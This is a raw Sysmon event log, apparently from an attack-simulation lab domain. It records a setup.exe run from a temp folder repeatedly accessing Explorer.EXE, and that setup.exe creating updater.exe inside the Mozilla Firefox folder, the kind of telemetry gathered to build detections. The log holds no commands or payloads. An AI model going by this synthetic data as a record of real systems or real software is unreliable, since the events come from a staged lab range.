13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\updater.exe2021-01-18 13:59:52.567 10341000x800000000000000015471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(w